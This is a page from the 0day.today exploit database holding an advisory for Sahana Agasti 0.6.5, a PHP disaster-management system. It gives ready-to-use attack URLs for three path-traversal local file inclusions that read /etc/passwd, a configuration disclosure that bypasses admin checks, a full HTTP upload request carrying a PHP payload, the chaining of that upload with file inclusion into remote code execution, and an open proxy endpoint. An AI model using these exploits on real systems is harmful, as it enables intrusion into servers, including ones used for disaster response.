0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sahana Agasti <= 0.6.5 Multiple Vulnerabilities
[#############################################################
# [ Sahana Agasti <= 0.6.5 ] Multiple Vulnerabilities #
#############################################################
#
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.
# Based a long-term preparedness for disaster management..."
#
# Script site: http://www.sahanafoundation.org/
# Download: https://launchpad.net/sahana-agasti/
#
[LFI] Vuln: ( Scenario 1)
http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../../../../../../../../etc/passwd%00
File: ./sahana-0.6.5/www/stream.php
20 $global['approot'] = realpath(dirname(__FILE__)).'/../';
21 // $global['approot'] = '/usr/local/bin/sahana/';
22 $global['previous']=false;
...(CUT)...
39 if(!$global['previous']){
40 $global['action'] = (NULL == $_REQUEST['act']) ?
41 "default" : $_REQUEST['act'];
42 $global['module'] = (NULL == $_REQUEST['mod']) ?
43 "home" : $_REQUEST['mod'];
44 }
45 $global['stream_type'] = $_GET['stream_type']; // [1]
...(CUT)...
52 shn_front_controller();
...(CUT)...
64 function shn_front_controller()
65 {
66 global $global;
67 global $conf;
68 $approot = $global['approot'];
69 $action = $global['action'];
70 $module = $global['module'];
...(CUT)...
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){// [2]
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc'); // [3] LFI
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';
94 else
95 $default_file = 'stream.inc';
96 }
In this scenario script try to include something like this:
/var/www/apache/sahana/www/..//inc/lib_st_/../../../../../../../../../etc/passwd\0.inc
################################################################################################################################
[LFI] Vuln: ( Scenario 2)
http://site.com/sahana-0.6.5/www/stream.php?mod=/../../../../../../../../../etc/passwd%00
File: ./sahana-0.6.5/www/stream.php
42 $global['module'] = (NULL == $_REQUEST['mod']) ?
43 "home" : $_REQUEST['mod'];
...(CUT)...
70 $module = $global['module'];
...(CUT)...
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc');
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';
94 else
95 $default_file = 'stream.inc';
96 }else
97 $default_file = 'main.inc'; // [1]
98
99 // include the correct module file based on action and module
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [2]
101 if (! file_exists($module_file)) { //
102 $module_file = $approot.'mod/home/'.$default_file;
103 }
...(CUT)...
109 //Include the module file
110 include($module_file); // [3] LFI
In this scenario script try to include something like this:
/var/www/apache/sahana/www/../mod//../../../../../../../../../etc/passwd\0/main.inc
################################################################################################################################
[LFI] Vuln: ( Scenario 3 without file_exists)
http://site.com/sahana-0.6.5/www/stream.php?act=adm&mod=/../../../../../../../../../etc/passwd%00
File: ./sahana-0.6.5/www/stream.php
42 $global['module'] = (NULL == $_REQUEST['mod']) ? // [1]
43 "home" : $_REQUEST['mod'];
...(CUT)...
84 if (preg_match('/^adm/',$action)) { //
85 $module = 'admin'; // [2]
86 $action = 'modadmin'; //
87 }
...(CUT)...
96 }else
97 $default_file = 'main.inc'; // [3]
98
99 // include the correct module file based on action and module
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [4] ( /var/www/apache/sahana/www/../mod/admin/main.inc )
...(CUT)...
110 include($module_file); // [5]
...(CUT)...
125 $module_function = 'shn_'.$module.'_'.$action; // [6]
126 if (!function_exists($module_function)) { //
127 $module_function='shn_'.$module.'_default';
128 }
129 $_SESSION['last_module']=$module;
130 $_SESSION['last_action']=$action;
131 $output = $module_function(); // [7] ( shn_admin_modadmin() )
File: ./sahana-0.6.5/mod/admin/main.inc
161 function shn_admin_modadmin()
162 {
163 global $global;
164
165 // include original module admin section
166 include $global['approot']."/mod/".$global['module']."/admin.inc"; // [8] LFI
In this scenario script try to include something like this:
/var/www/apache/sahana/www/..//mod//../../../../../../../../../etc/passwd\0/admin.inc
################################################################################################################################
[Configuration disclosure] Vuln:
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=conf_list
File: ./sahana-0.6.5/www/stream.php
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [1] ( /var/www/apache/sahana/www/../mod/admin/main.inc )
...(CUT)...
110 include($module_file); // [2]
...(CUT)...
125 $module_function = 'shn_'.$module.'_'.$action; // [3]
126 if (!function_exists($module_function)) {
127 $module_function='shn_'.$module.'_default';
128 }
129 $_SESSION['last_module']=$module;
130 $_SESSION['last_action']=$action;
131 $output = $module_function(); // [4] ( shn_admin_conf_list() )
File: ./sahana-0.6.5/mod/admin/main.inc
31 include_once $global['approot']."mod/admin/conf_admin.inc"; // [5]
File: ./sahana-0.6.5/mod/admin/conf_admin.inc
22 function shn_admin_conf_list() // [6] Configuration disclosure
...(CUT)...
We can prepare function name, with using GET variables (mod, act)
We can use prepared functions with "shn_" prefix, with bypassing admin privileges
So lets see what next..
################################################################################################################################
[Arbitrary File Upload] Vuln:
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser
File: ./sahana-0.6.5/www/stream.php
131 $output = $module_function(); // [1] ( shn_admin_lc_file_browser()
File: ./sahana-0.6.5/mod/admin/main.inc
683 function shn_admin_lc_file_browser() // [2] Arbitrary File Upload
684 {
685 global $global;
686 $locale = $_POST['locale'];
687 //$file_type=$_POST['file_type'];
688 $uploaddir = "../res/locale/$locale/LC_MESSAGES/";
689 //"../res/locale/$locale/LC_MESSAGES/";
690 //echo $uploaddir;
691 $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
692
693 if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
694 add_confirmation('File uploaded sucessfully');
695 }else {
696 add_error('File uploaded failed');
697 }
698
699 }
We can upload some file to /res/locale/$locale/LC_MESSAGES/ (default $locale is my_MM),
with using prepared POST
Example:
POST /sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------11682257938924
Content-Length: 420
-----------------------------11682257938924
Content-Disposition: form-data; name="MAX_FILE_SIZE"
50000
-----------------------------11682257938924
Content-Disposition: form-data; name="userfile"; filename="file.txt"
Content-Type: text/plain
<?php phpinfo(); ?>
-----------------------------11682257938924
Content-Disposition: form-data; name="locale"
my_MM
-----------------------------11682257938924--
File /res/locale/my_MM/LC_MESSAGES/file.txt is created
We can use main.inc filename instead of file.txt
So let's go back to LFI ( scenario 1,2 ):
( scenario 1 ) http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../res/locale/my_MM/LC_MESSAGES/main
( scenario 2 ) http://site.com/sahana-0.6.5/www/stream.php?mod=/..//res/locale/my_MM/LC_MESSAGES/
It includes LC_MESSAGES/main.inc with our <?php phpinfo(); ?> (AFU+LFI=RCE)
################################################################################################################################
[PHP Proxy]
http://site.com/sahana-0.6.5/www/res/lib_proxy.php?url=http://site2.com/dupa.php
File: ./sahana-0.6.5/www/res/lib_proxy.php
17 $url = $_GET['url'];
18 $parseurl = urldecode($url);
19
20 // open cURL session
21 $ch = curl_init();
22 curl_setopt($ch, CURLOPT_POST,1);
23 curl_setopt($ch, CURLOPT_URL,$parseurl);
24 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
25 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
26 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
27
28 $xml = curl_exec($ch);
29 curl_close($ch);
30
31 header("Content-Type: text/xml");
32
33 echo $xml;
################################################################################################################################
And possible other bugs...
################################################################################################################################
# 0day.today [2024-11-15] #